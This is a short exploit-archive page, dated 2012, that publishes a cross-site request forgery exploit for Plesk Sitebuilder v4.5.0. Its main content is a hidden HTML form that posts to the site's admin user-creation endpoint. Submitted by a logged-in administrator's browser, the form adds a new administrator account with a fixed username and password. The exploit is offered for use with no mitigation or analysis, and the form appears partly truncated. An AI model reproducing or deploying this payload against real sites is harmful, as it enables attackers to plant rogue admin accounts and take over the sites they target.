facebook facebook twitter rss

Plesk Sitebuilder v4.5.0 for Linu/Unix CSRF Vulnerability (Add Admin)

Author: Aboud-el , Published: 09-06-2012
Plesk Sitebuilder v4.5.0 for Linu/Unix  CSRF Vulnerability (Add Admin)
====================================================================

.:. Author : Aboud-el [aboud_el@hotmail.com]
.:. Script : http://www.parallels.com/products/plesk/sitebuilder/demo/

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/Admin/User/New">
<input type="hidden" name="action" value="/Admin/User/Create"/>
<input type="hidden" name="firstName" value="....."/>
<input type="hidden" name="lastName" value="....."/>
<input type="hidden" name="userName" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="confirmPassword" value="123456"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="roleId" value="1"/>
<input type="hidden" name="planId" value="2"/>
</form>

</body>
</html>


####################################################################

Like us on Facebook :